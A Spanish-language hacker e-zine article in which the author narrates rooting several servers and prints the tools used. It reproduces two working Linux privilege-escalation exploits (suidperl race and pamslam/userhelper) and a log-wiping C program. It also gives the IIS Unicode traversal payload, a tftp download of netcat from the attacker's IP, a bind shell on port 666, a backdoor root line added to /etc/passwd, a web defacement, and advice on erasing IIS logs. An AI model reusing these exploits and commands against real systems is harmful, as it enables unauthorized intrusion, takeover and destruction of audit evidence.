0x0A: R00Teando
En este articulo pongo una especie de log, ya que esta 100% escrito por mi, no guarde el log autentico, asique no es 100% igual lo que aparece por pantalla, pero la idea es totalmente igual. Esta hecho solo para que veas con la simplesa que cualquiera puede obtener root en un servidor, no para que andes usando esto para actos maliciosos.
ESTE TEXTO VA DEDICADO A UN SIMPATICO TIPO QUE ENTRO A NUESTRO CANAL, NO RECUERDO SU NICK, PERO CON MUCHAS PATAS ENTRO Y ME DIJO QUE CON QUE CARA ME ATREVIA A ESCRIBIR UNA REVISTA SI YO NUNCA HABIA ROOTEADO NADA, LE FALTO POCO PARA DECIR QUE NO SABIA NI USAR NETBUS.BUENO QUERIDO AMIGO, ESTE TEXTO TE LO DEDICO A TI... ESPERO QUE TE GUSTE.
Empezemos
Bueno a continuacion explico como obtuve root dos veces en el servidor que puso CeroAbsoluto.
1°. (cuando el sistema estaba recien instalado y sin ningun parche)
Login: little
Password: XXXX
[ little@CeroAbsoluto ]$ picoahi entre al editor, copie un exploit que sabia que si funcionaba en ese sistema =) y puso ^O puse little.sh para guardarlo bajo ese nombre y luego ^X para salir del editor. (el exploit te lo pongo al tiro, calma)
[ little@CeroAbsoluto ]$ chmod +x little.sh
[ little@CeroAbsoluto ]$ ./little.sh
[*] Using suidperl=/usr/bin/suidperl, suidbin=/usr/bin/passwd...
[+] Checks passed, compiling flares and helper applications...
[+] Starting exploit. It could take up to 5 minutes in order to get
[+] working root shell. WARNING - WARNING - WARNING: it could cause
[+] heavy system load.
[+] VOILA, BABE :-) Entering rootshell...[ root@CeroAbsoluto ]# hmm hermoso no??
Bueno era un sistema instalado asi nada mas, no estaba dificil, pero la imaginacion viene con lo que hagas despues.
2° Pc de cero ya parchadito, o mas parchadito que antes...
ya no tengo mi hermosa cuenta de root... :(
pero aun queda mas opciones, se de otra vulnerabilidad en ese sistema, la de userhelper. Por supuesto que esta vez no fue como la primera, asi que esto fue luego de un rato de experimetacion.
[ little@CeroAbsoluto ]$ cat > little.sh << __eof
>#!/bin/sh
>....
>__eof
[ little@CeroAbsoluto ]$ chmod +x little.sh
[ little@CeroAbsoluto ]$ ./little.sh
ooOO...
bash# id
uid=0(root) gid=506(little) egid=506(little)bueno ya soy root, pero me falta el gid y egid (aunq da lo mismo en verdad, pero saquemoslos igual, para que vean un grave error que cometi)
bash# echo "systat::0:0::/:/bin/bash" >> /etc/passwd
bash# su systat
bash# id
uid=0(root) gid=0(root) egid=0(root)ahora si me gusto. =)
bash# cd /home/httpd/html/shell
bash# ls -la
hackear.htm
bash# picoedite la nueva pagina y la puse...
bash# cp hackear.htm ../index.html
eso es para q todos la pudiesen ver ;)
bash# passwd
New password: XXXX
Retype: XXXXERROR, no soi systat, el sistema me reconoce por lo numeros(UID), asi q no cambie mi pass, cambie el del root, por suerte estaba aun online cuando Cero se dio cuenta pq si no, ya que despues de esa noche me cortaron el telefono por un tiempito.
bash# exit
bash# exit
[ little@CeroAbsoluto ]$ cd
[ little@CeroAbsoluto ]$ cat .bash_hitoryEsto fue para ver que cosa quedo logeada en mi histori de comandos, la verdad es que nada especial y en todo caso da lo mismo, el trato es no tocar los logs.
Bueno eso fueron algunos experimentos por ahi con mi amigo CeroAbsoluto. Claro que estan resumidos para ir al grano, antes de eso vinieron muchas cosas, por ejemplo algo que hice que me sirvio mucho fue ejecutar los siguientes comandos:
find /bin -user root -perm +a=seso con todos los directorios mas importantes, ¿que hace?, me muestra los programas que tienen suid, por eso si se que son vulnerables y ademas tiene suid puedo ser root. Esto lo aprendi cuando aprendi a programar stack overflow exploits, en un texto de aleph one.
Esto tambien se usa para buscar programas que podriamos explotarlos con un stack overflow exploit.
Los exploit...
Caso 1:
#!/bin/sh
#
# -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
#
# Wonderful, lovely, world-smashing, exciting perl exploit. It works against
# +s suidperl, exploiting undocumented /bin/mail feature when perl wants to
# notify root on inode race conditions. Currently, tested under RH Linux.
#
# What's probably most shocking, buggy code has following comment inside:
# /* heh, heh */. I guess author wasn't laughning last.
#
# Development history of this exploit is really funny. I found this condition
# about 4 months ago, but thought it's useless (who wants to notify root?).
# I deleted my test code and didn't left any notes on it. Then, month after
# this discovery, Sebastian contacted me. He was working on perl exploit.
# He told me he don't know how to cause this condition to happen, but
# if he realise how he can do it, he'll be able to use undocumented /bin/mail
# feature - environmental variable 'interactive', which, if set, causes
# /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
# on terminal. And then I understood what I've done. I spent next month
# (yes! no kidding!) trying to recall what the fsck was the condition. I
# remembered it was trivial, even annoying... And finally, now I'm able to
# reconstruct it.
#
# This exploit tries to fit in rather short, but reasonable time window in
# order to exploit it. I tested it on fast, not overloaded Linux box, and
# I guess on slow machines it needs tunning. It needs anything setuid
# (/usr/bin/passwd is just fine), writable working directory and something
# around 4 minutes. Working directory should be mounted without noexec or
# nosuid options (if so, find something like /var/lib/svgalib etc).
#
# WARNING: On slow machines, it's quite possible this exploit will cause
# heavy load. Please test it when system is not overloaded and not used
# (eg. at night).
#
#
# I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
# - I think I can say it without shame), and especially thank to several of
# my braincells that survived monitor radiation and made me recall this
# race condition.
#
# Send comments, ideas and flames to <lcamtuf@ids.pl>
# Tested with sperl 5.00503, but should work with any other as well.
#
# Good luck and don't abuse it.
#
# Slackware 7.1 / 7.0
# Redhat 6.2 / 6.1 / 5.2
clear
echo "Suidperl 5.00503 (and newer) root exploit"
echo "-----------------------------------------"
echo "Written by Michal Zalewski <lcamtuf@dione.ids.pl>"
echo "With great respect to Sebastian Krahmer..."
echo
SUIDPERL=/usr/bin/suidperl
SUIDBIN=/usr/bin/passwd
echo "[*] Using suidperl=$SUIDPERL, suidbin=$SUIDBIN..."
if [ ! -u $SUIDPERL ]; then
echo "[-] Sorry, $SUIDPERL4 is NOT setuid on this system or"
echo " does not exist at all. If there's +s perl binary available,"
echo " please change SUIDPERL variable within exploit code."
echo
exit 0
fi
if [ ! -u $SUIDBIN ]; then
echo "[-] Sorry, $SUIDBIN is NOT setuid on this system or does not exist at"
echo " all. Please pick any other +s binary and change SUIDBIN variable"
echo " within exploit code."
echo
exit 0
fi
echo "[+] Checks passed, compiling flares and helper applications..."
echo
cat >flare <<__eof__
#!/usr/bin/suidperl
print "Nothing can stop me now...\n";
__eof__
cat >bighole.c <<__eof__
main() {
setuid(0);
setgid(0);
chown("sush",0,0);
chmod("sush",04755);
}
__eof__
cat >sush.c <<__eof__
main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
__eof__
make bighole sush
echo
if [ ! -x ./sush ]; then
echo "[-] Oops, seems to me I cannot compile helper applications. Either"
echo " you don't have working 'make' or 'gcc' utility. If possible,"
echo " please compile bighole.c and sush.c manually (to bighole and sush)."
echo
exit 0
fi
echo "[+] Setting up environment..."
chmod 4755 ./flare
FILENAME='none
~!bighole
'
export interactive=1
PATH=.:$PATH
echo "[+] Starting exploit. It could take up to 5 minutes in order to get"
echo "[+] working root shell. WARNING - WARNING - WARNING: it could cause"
echo "[+] heavy system load."
while :; do
( ln -f -s $SUIDBIN "$FILENAME";usleep $RANDOM; nice -n +20 $SUIDPERL ./"$FILENAME" <./flare & ) &>/dev/null &
( usleep $RANDOM ; ln -f -s /dev/stdin "$FILENAME" ) &>/dev/null &
if [ -u ./sush ]; then
echo
echo "[+] VOILA, BABE :-) Entering rootshell..."
echo
rm -f "$FILENAME" sush.c bighole bighole.c flare
./sush
echo
echo "[+] Thank you for using Marchew Industries / dupa.ryba products."
echo
rm -f "$FILENAME" sush.c bighole bighole.c flare sush
exit 0
fi
done
# www.hack.co.za [7 August 2000]#
############################################################################
############################################################################
Exploit 2:
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#
# synopsis:
# both 'pam' and 'userhelper' (a setuid binary that comes with the
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
# _pam_add_handler(), we can get it to dlopen any file on disk.
'userhelper'
# being setuid means we can get root.
#
# fix:
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
# for a quick fix. Remember 'strcat' isn't a very good way of confining
# a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}
EOF
echo -n .
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf
############################################################################
############################################################################Bueno vamos a otro ejemplo...
Un hermoso RedHat 7.0 (dejemoslos como alguno , en verdad es el nuevo sistema de ceroabsoluto)
Login: alguno
Password: XXXX
[ alguno@alguno ]$ find /bin -user root -perm +a=sAqui salimos premiados, encontre un suid que es vulnerable a un exploit escrito por mi. Esta basado en otro exploit, que estaba echo en bash, por deporte lo pase a C y asi aproveche de darle ciertas opciones intersantes.
[ alguno@alguno ]$ pico
[ alguno@alguno ]$ gcc -o ping ping.c
[ alguno@alguno ]$ ./ping
[ root@alguno ]#solamente toque algunas cositas y mire un poco el sistema, ni siquiera puse una backdoor, aunque la tentacion estuvo...
y antes de irme... hice esto:
[ root@alguno ]# picopegue mi logs.c (lo puedes encontrar en mi web, es un programa que me hice que borra las huellas en un sistema linux)
[ root@alguno ]# gcc logs.c
[ root@alguno ]# rm logs.c
[ root@alguno ]# ./a.outPrograma que borra tus huellas
Programado por THE-LITTLE
the-little@usa.net\nwww.syst4t.subnet.dk
Tienes 4,5 minutos para abandonar el sistema
[ root@alguno ]# rm a.out
[ root@alguno ]# picoa tocar un poquito los bash_history
y luego irnos...
[ root@alguno ]# exit
[ alguno@alguno ]$ logoutEl exploit lo puedes encontrar en mi web, en la parte Files->Exploits el nombre de este es ping.c, esta escrito solo con fines educativos.
Aqui les agrego tmb el logs.c
-------------------------------------------------------
/*
Programa encargado de borrar los logs en un sistema unix
programado por The-Little
the-little@usa.net
www.syst4t.subnet.dk
Systat Team
*/
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<signal.h>
void main(void)
{
int separacion;
printf("\nPrograma que borra tus huellas\n");
printf("--------------------------------\n");
printf("\nProgramado por THE-LITTLE");
printf("\nthe-little@usa.net\nwww.syst4t.subnet.dk\n");
printf("Tienes 4,5 minutos para abandonar el sistema\n");
setpgrp();
signal(SIGHUP, SIG_IGN);
separacion = fork();
if(separacion==0)
{
sleep(60);
sleep(60);
sleep(60);
sleep(60);
sleep(60);
system("rm /var/log/lastlog");
system("rm /var/log/wtmp");
system("rm /var/log/messages");
system("rm /var/log/secure");
system("rm /var/run/utmp");
system("rm /var/log/xferlog");
system("rm /var/log/sendmail.st");
system("rm /var/log/*.log");
system("rm /var/log/ppd*");
system("rm /var/log/maillog");
system("rm /var/log/httpd/*");
system("echo \"\" > /var/log/lastlog");
system("echo \"\" > /var/log/wtmp");
system("echo \"\" > /var/log/messages");
system("echo \"\" > /var/log/secure");
system("echo \"\" > /var/run/utmp");
system("echo \"\" > /var/log/xferlog");
system("echo \"\" > /var/log/sendmail.st");
system("echo \"\" > /var/log/maillog");
}
}
------------------------------------------------------------Este programa lo hice en remplazo del antiguo logback.c y me ha funcionado de maravilla. Aunque el logback lo arregle y tambien esta al 100% .
Bueno y despues de tres veces seguidas un linux, vamonos a un windows. A continuacion un boletin de hispasec que reporta algunas vulnerabilidades del w$ NT/2K, abajo pongo un exploit que escribi para explotar esta vulnerabilidad.
REPORTE DE HISPASEC
Una grave vulnerabilidad afecta a todos los servidores IIS
Todos los servidores web con Internet Information Server pueden estar afectados por una grave vulnerabilidad que permite a un atacante la ejecución de programas en la máquina.
El problema afecta a las versiones de Internet Information Server 4.0 y 5.0 y la gravedad del problema es tal que la propia Microsoft recomienda la actualización inmediata de todos los servidores IIS. El problema se basa en una vulnerabilidad típica y conocida de los lectores habituales, como es la escalada de directorios mediante el uso de "../". Esta cadena introducida en peticiones web especialmente construidas, como es el caso que nos ocupa, permite subir directorios y escapar del árbol del web.
Este tipo de ataques son habituales, si bien en esta ocasión para evitar la protección impuesta por IIS ante estas peticiones se logra reproducir el problema mediante la sustitución de los caracteres "/" y "\" por su representación mediante caracteres UNICODE. Los caracteres UNICODE son la representación hexadecimal de su valor ASCII precedido de un símbolo %.
El problema es especialmente grave ya que esta vulnerabilidad puede permitir acceder a la ejecución de cualquier comando, incluido lograr el listado completo del árbol de directorios y archivos, borrar y modificar ficheros, ejecutar un FTP, etc.
Como ya hemos explicado el problema se basa en la sustitución de los caracteres "/" y "\" por su representación UNICODE, lo cual quiere decir que dependerá del tipo de fuentes instaladas en el servidor. Así por ejemplo una construcción valida para determinados servidores, con la que se lograría un dir del directorio raíz, sería:
http://servidor.iis.afectado/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\Aunque como depende del tipo de fuentes otras representaciones válidas son
%c0%af, %c1%9c, %c0%qf, %c1%8s, %c1%9c y %c1%pc.Microsoft ha reaccionado con la publicación de parches para todas las versiones de IIS y lenguajes, por lo cual, debido la gravedad del problema recomendamos la instalación inmediata del parche.
Opina sobre esta noticia: http://www.hispasec.com/unaaldiacom.asp?id=726
Más información:
- Parche para IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
- Parche para IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
- Patch Available for Web Server Folder Traversal Vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
- Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal Vulnerability http://www.securityfocus.com/vdb/?id=1806
Antonio Ropero
antonior@hispasec.com
---------------------------------------------------
(c) Hispasec, 2000 www.hispasec.com/copyright.asp
---------------------------------------------------Ahora como podemos explotar esta falla...
La verdad es que esta tecnica la he ido evolucionando de a poco, primero con mi exploit solo podia hacer dir y pasearme, luego con una comentario de CeroAbsoluto se me comenzo a prender la ampolleta y luego con una ayudita de ZeroX termine de caer en como explotarlo, la tecnica que resulto de esta evolucion fue:
./iis www.alco.com
Exploit escrito por z0rbas ...
...
...
WinNtShell ]$ dir
Lista de archivos
...
...
WinNtShell ]$Ahora comienza el hack propiamente tal, tomamos alguien con win o con linux, da lo mismo, si estas en win, corres el tftpd32.zip de la web y si estas en linux, activas el servicio de tftp (OjO, no es lo mismo que ftp). Dentro de la carpeta donde estan los archivos que pueden bajar de tu pc pones el netcat (tambien lo puedes bajar en nuestra web) activas el tftpd y ejecutas esto en iis
WinNtShell ]$ tftp -i [TU_IP] GET nc.exe picapoto.exeSi tienes permiso de escritura, al hacer dir de nuevo, te aparecera el famoso picapoto.exe , ahora viene la parte final para por fin poder entrar:
WinNtShell ]$ picapoto -l -p 666 -e cmd.exeEsto se queda pegado, asi que no creas que se colgo el exploit, no lo toques y dejalo, abre el telnet y haz telnet al puerto 666, ahora estas frente a una shell de DOS comun y corriente, suerte.
Por si acaso, no tienes permisos de admin, por lo que no puedes borrar el log de esa fecha, asique yo te recomendaria que hasta aqui llegaras a las 11:50 de la hora del servidor para que a las 12 ya puedas borrar el log anterior, ya que el log del iis queda asi:
C:\WINNT\system32\LogFiles\W3SVC1>dir
El volumen de la unidad C es WIN2000
El n˙mero de serie del volumen es: 040A-44F6
Directorio de C:\WINNT\system32\LogFiles\W3SVC1
07-03-2001 19:58 <DIR> .
07-03-2001 19:58 <DIR> ..
08-03-2001 23:06 21 ex010308.log
09-03-2001 00:37 76.961 ex010309.log
2 archivos 76.982 bytes
2 dirs 858.095.616 bytes libres
C:\WINNT\system32\LogFiles\W3SVC1>more ex010309.log
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-03-09 00:04:37
#Fields: time c-ip cs-method cs-uri-stem sc-status
00:04:37 200.61.40.80 GET /n0nexi5tent_fi1e.html 404
00:04:42 200.61.40.80 GET /index.html 200
00:04:46 200.61.40.80 GET /etc/group 404
00:04:49 200.61.40.80 GET /boot.ini 404
00:04:58 200.61.40.80 GET /etc/group 404
00:05:01 200.61.40.80 GET /boot.ini 404
00:05:04 200.61.40.80 GET /cgi-bin/webdist.cgi 404
00:05:13 200.61.40.80 GET /cgi-bin/campas 404
00:05:16 200.61.40.80 GET /cgi-bin/htmlscript 404
00:05:20 200.61.40.80 GET /cgi-bin/php.cgi 404
00:05:23 200.61.40.80 GET /cgi-bin/pfdispaly 404
00:05:26 200.61.40.80 GET /cgi-bin/pfdispaly.cgi 404
00:05:29 200.61.40.80 GET /cgi-bin/view-source 404
00:05:31 200.61.40.80 GET /cgi-bin/htsearch 404
00:05:37 200.61.40.80 GET /cgi-bin/infosrch.cgi 404
00:05:40 200.61.40.80 GET /cgi-bin/faxsurvey 404
00:05:44 200.61.40.80 GET /cgi-bin/counterfiglet/nc/f=;cat+/etc/group 404
00:05:47 200.61.40.80 GET /cgi-bin/calendar_admin.pl 404
00:05:50 200.61.40.80 GET /cgi-bin/calendar/calendar_admin.pl 404
00:05:53 200.61.40.80 GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi 404
00:05:56 200.61.40.80 GET /cgi-bin/bb-hostsvc.sh 404
00:05:59 200.61.40.80 GET /cgi-bin/netauth.cgi 404
00:22:53 200.61.40.80 GET /cgi-bin/phf 404
00:22:56 200.61.40.80 GET /cgi-bin/php.cgi 404
00:23:01 200.31.59.141 GET /index.html 304
00:23:06 200.61.40.80 GET /cgi-bin/Count.cgi 404
00:23:09 200.61.40.80 GET /cgi-bin/test-cgi 404
00:23:12 200.61.40.80 GET /cgi-bin/unlg1.1 404
00:23:15 200.61.40.80 GET /cgi-bin/nph-test-cgi 404
00:23:18 200.61.40.80 GET /cgi-bin/handler 404
00:23:26 200.61.40.80 GET /cgi-bin/webgais 404
00:23:29 200.61.40.80 GET /cgi-bin/websendmail 404
00:23:32 200.61.40.80 GET /cgi-bin/webdist.cgi 404
00:23:41 200.61.40.80 GET /cgi-bin/faxsurvey 404
00:23:44 200.61.40.80 GET /cgi-bin/htmlscript 404
00:23:48 200.61.40.80 GET /cgi-bin/pfdispaly.cgi 404
00:23:51 200.61.40.80 GET /cgi-bin/perl.exe 404
00:23:59 200.61.40.80 GET /cgi-bin/wwwboard.pl 404
00:24:35 200.31.59.141 GET /index.html 304
00:27:19 200.27.2.83 GET /index.html 200
00:27:27 200.31.59.141 GET /index.html 304
00:29:16 200.31.59.141 GET /index.html 304
00:30:16 164.77.112.31 GET /index.html 200
00:32:19 200.28.96.104 GET /index.html 200
00:34:26 200.31.58.10 GET /index.html 200
00:35:19 200.31.59.141 GET /index.html 304
00:35:28 200.28.96.104 GET /favicon.ico 404
00:35:32 200.28.96.104 GET /favicon.ico 404
00:42:43 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
00:43:29 200.31.59.141 GET /index.html 304
00:43:34 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
00:43:43 200.31.58.10 GET /sanot2.htm 404
00:44:55 200.31.59.141 GET /default.asp 404
00:45:48 200.31.59.141 GET /default.asp 404
00:46:24 200.31.59.141 GET /global.asa::$DATA 404
00:46:31 200.31.59.141 GET /global.asa::DATA$ 404
00:47:08 200.31.59.141 GET /index.html 304
00:48:21 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
00:48:52 200.31.59.141 GET /index.html 304
00:50:57 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
00:51:13 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
00:55:31 200.31.59.141 GET /index.html 304
00:55:59 200.29.11.111 GET /index.html 200
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-03-09 00:59:10
#Fields: time c-ip cs-method cs-uri-stem sc-status
01:00:34 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 200
01:01:45 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:01:49 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 200
01:01:58 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:04:54 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:07:29 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:07:31 200.28.195.221 GET /scripts/../../winnt/system32/cmd.exe 200
01:07:49 200.28.195.221 GET /scripts/../../winnt/system32/cmd.exe 200
01:09:00 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:09:14 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:10:03 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:10:39 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:10:57 200.28.195.221 GET /scripts/../../winnt/system32/cmd.exe 502
01:11:06 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:12:56 200.31.59.141 GET /index.html 200
01:13:01 200.28.195.221 GET /scripts/../../winnt/system32/cmd.exe 502
01:13:41 200.31.59.141 GET /index.html 304
01:13:44 200.31.59.141 GET /index.html 304
01:14:38 200.31.58.10 GET /hackeada.html 404
01:14:40 200.31.59.141 GET /index.html 200
01:15:13 200.28.195.221 GET /scripts/../../winnt/system32/cmd.exe 502
01:15:15 200.31.59.141 GET /index.html 200
01:16:11 200.31.59.141 GET /index.html 200
01:16:44 200.31.59.141 GET /index.html 304
01:17:12 200.31.59.141 GET /index.html 304
01:19:56 200.31.59.141 GET /index.html 304
01:22:29 200.31.59.141 GET /index.html 304
01:22:48 64.76.16.54 GET /index.html 200
01:23:03 200.31.58.10 GET /index.html 200
01:23:47 64.76.19.58 GET /cgi-bin/phf 404
01:23:50 64.76.19.58 GET /cgi-bin/php.cgi 404
01:23:55 64.76.19.58 GET /cgi-bin/Count.cgi 404
01:23:58 64.76.19.58 GET /cgi-bin/test-cgi 404
01:24:00 64.76.19.58 GET /cgi-bin/unlg1.1 404
01:24:03 64.76.19.58 GET /cgi-bin/nph-test-cgi 404
01:24:05 64.76.19.58 GET /cgi-bin/handler 404
01:24:17 64.76.19.58 GET /cgi-bin/webgais 404
01:24:20 64.76.19.58 GET /cgi-bin/websendmail 404
01:24:31 64.76.19.58 GET /cgi-bin/webdist.cgi 404
01:24:38 64.76.19.58 GET /cgi-bin/faxsurvey 404
01:24:46 64.76.19.58 GET /cgi-bin/htmlscript 404
01:24:48 64.76.19.58 GET /cgi-bin/pfdispaly.cgi 404
01:24:51 64.76.19.58 GET /cgi-bin/perl.exe 404
01:24:53 64.76.19.58 GET /cgi-bin/wwwboard.pl 404
01:24:56 200.31.59.141 GET /index.html 304
01:24:57 200.31.59.141 GET /index.html 304
01:24:57 200.31.59.141 GET /index.html 304
01:24:59 200.31.59.141 GET /index.html 304
01:25:01 64.76.19.58 GET /cgi-bin/www-sql 404
01:25:03 64.76.19.58 GET /cgi-bin/view-source 404
01:25:10 64.76.19.58 GET /cgi-bin/campas 404
01:25:13 64.76.19.58 GET /cgi-bin/aglimpse 404
01:25:14 200.31.59.141 GET /index.html 304
01:25:15 64.76.19.58 GET /cgi-bin/man.sh 404
01:25:15 200.31.59.141 GET /index.html 304
01:25:18 64.76.19.58 GET /cgi-bin/AT-admin.cgi 404
01:25:21 64.76.19.58 GET /cgi-bin/filemail.pl 404
01:25:28 64.76.19.58 GET /cgi-bin/fexplore.exe 404
01:25:31 64.76.19.58 GET /cgi-bin/maillist.pl 404
01:25:33 64.76.19.58 GET /cgi-bin/jj 404
01:25:42 64.76.19.58 GET /cgi-bin/info2www 404
01:25:47 64.76.19.58 GET /cgi-bin/files.pl 404
01:26:00 64.76.19.58 GET /cgi-bin/finger 404
01:26:07 64.76.19.58 GET /cgi-bin/bnbform.cgi 404
01:26:10 64.76.19.58 GET /cgi-bin/survey.cgi 404
01:26:26 64.76.19.58 GET /cgi-bin/AnyForm2 404
01:26:29 64.76.19.58 GET /cgi-bin/Textcounter.pl 404
01:26:31 64.76.19.58 GET /cgi-bin/classifieds.cgi 404
01:26:34 64.76.19.58 GET /cgi-bin/environ.cgi 404
01:26:36 64.76.19.58 GET /cgi-bin/whois_raw.cgi 404
01:26:39 64.76.19.58 GET /vti_pvt/service.pwd 404
01:26:41 200.31.59.141 GET /index.html 304
01:26:42 64.76.19.58 GET /vti_pvt/users.pwd 404
01:26:44 64.76.19.58 GET /vti_pvt/authors.pwd 404
01:26:50 64.76.19.58 GET /vti_pvt/administrators.pwd 404
01:26:57 64.76.19.58 GET /cgi-dos/args.bat 404
01:26:59 64.76.19.58 GET /cgi-win/uploader.exe 404
01:27:01 64.76.19.58 GET /search97.vts 404
01:27:01 200.28.195.221 GET /index.html 200
01:27:06 200.31.59.141 GET /index.html 304
01:27:06 200.31.59.141 GET /index.html 304
01:27:09 64.76.19.58 GET /carbo.dll 404
01:27:09 200.28.195.221 GET /imagenes/sam 404
01:27:17 64.76.19.58 GET /cgi-bin/phf 404
01:27:19 64.76.19.58 GET /cgi-bin/php.cgi 404
01:27:19 200.31.59.141 GET /index.html 304
01:27:33 200.28.195.221 GET /web/imagenes/sam 404
01:27:33 64.76.19.58 GET /cgi-bin/test.cgi 404
01:27:36 64.76.19.58 GET /cgi-bin/webdist.cgi 404
01:27:44 64.76.19.58 GET /cgi-bin/htmlscript 404
01:27:53 64.76.19.58 GET /cfdocs/expeval/openfile.cfm 404
01:27:56 64.76.19.58 GET /cgi-bin/rwwwshell.pl 404
01:27:58 64.76.19.58 GET /cgi-bin/nph-publish 404
01:28:01 64.76.19.58 GET /cgi-bin/perl 404
01:28:04 64.76.19.58 GET /cgi-bin/glimpse 404
01:28:07 200.28.195.221 GET /imagenes/sam 404
01:28:11 64.76.19.58 GET /cgi-bin/wrap 404
01:28:14 64.76.19.58 GET /cgi-bin/cgiwrap 404
01:28:22 64.76.19.58 GET /cgi-bin/guestbook.cgi 404
01:28:25 64.76.19.58 GET /cgi-bin/edit.pl 404
01:28:27 64.76.19.58 GET /cgi-bin/perlshop.cgi 404
01:28:30 64.76.19.58 GET /_vti_inf.html 404
01:28:32 64.76.19.58 GET /_vti_pvt/service.pwd 404
01:28:39 64.76.19.58 GET /_vti_pvt/users.pwd 404
01:28:42 64.76.19.58 GET /_vti_pvt/authors.pwd 404
01:28:45 64.76.19.58 GET /_vti_pvt/administrators.pwd 404
01:28:47 64.76.19.58 GET /_vti_bin/shtml.dll 404
01:28:50 64.76.19.58 GET /_vti_bin/shtml.exe 404
01:28:57 200.28.195.221 GET /imagenes/team.gif 404
01:29:02 64.76.19.58 GET /cgi-bin/rguest.exe 404
01:29:17 200.47.86.38 GET /index.html 200
01:29:18 64.76.19.58 GET /cgi-bin/wguest.exe 404
01:29:31 64.76.19.58 GET /scripts/CGImail.exe 404
01:29:45 64.76.19.58 GET /scripts/tools/newdsn.exe 404
01:29:53 64.76.19.58 GET /scripts/fpcount.exe 404
01:30:00 64.76.19.58 GET /cfdocs/expelvel/openfile.cfm 404
01:30:03 64.76.19.58 GET /cfdocs/expelval/exprcalc.cfm 404
01:30:06 64.76.19.58 GET /cfdocs/expelval/displayopenedfile.cfm 404
01:30:11 64.76.19.58 GET /iissamples/exair/howitworks/codebrws.asp 404
01:30:21 64.76.19.58 GET /msads/Samples/SELECTOR/showcode.asp 404
01:30:26 200.31.59.141 GET /index.html 304
01:30:33 200.31.59.141 GET /index.html 304
01:31:45 200.31.59.141 GET /index.html 304
01:31:45 200.31.59.141 GET /index.html 304
01:32:03 200.28.195.221 GET /scripts/../../winnt/system32/cmd.exe 502
01:32:09 200.31.59.141 GET /index.html 304
01:32:11 200.31.59.141 GET /index.html 304
01:33:01 200.31.58.10 GET /scripts/../../winnt/system32/cmd.exe 502
01:33:11 200.31.58.10 GET /index.html 200
01:34:33 200.31.59.141 GET /index.html 200
01:34:33 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 200
01:35:09 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 502
01:35:21 200.28.195.221 GET /zerox.htm 404
01:35:41 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 502
01:35:58 200.28.195.221 HEAD /index.html 200
01:36:00 200.28.195.221 GET /index.html 200
01:36:07 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 500
01:36:07 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 500
01:36:07 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 500
01:36:08 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 500
...Esto es un pedazo de mi logfile, parece que alguien me anduvo escaniando La linea:
01:34:33 64.76.155.2 GET /scripts/../../winnt/system32/cmd.exe 200Demuestra que alguien ejecuto un comando, como lo se, porque apunta a cmd.exe y tiene el codigo de respuesta 200 que equivale a OK. A parte de eso no se logea mas, que alguien me corrija si me equivoco.
Si no tienes permiso de escritura en el directorio por donde ejecutas el cmd.exe puedes probar subirlo en C:\winnt\temp .
Y aprovechando, otro root mas...
IRIX
Bueno esto fue un hack en conjunto, yo aqui voi a contar como fue que yo personalmente obtuve root.
La verdad es que yo encontre este server porque no conocia los sistemas irix, asi que queria averiguar como eran los logs y todo eso para cachar un poquito, la verdad es que estuve buscando manuales y todo, pero no encontre nada... asi que me puse a buscar un irix y asi llegue a este servidor.
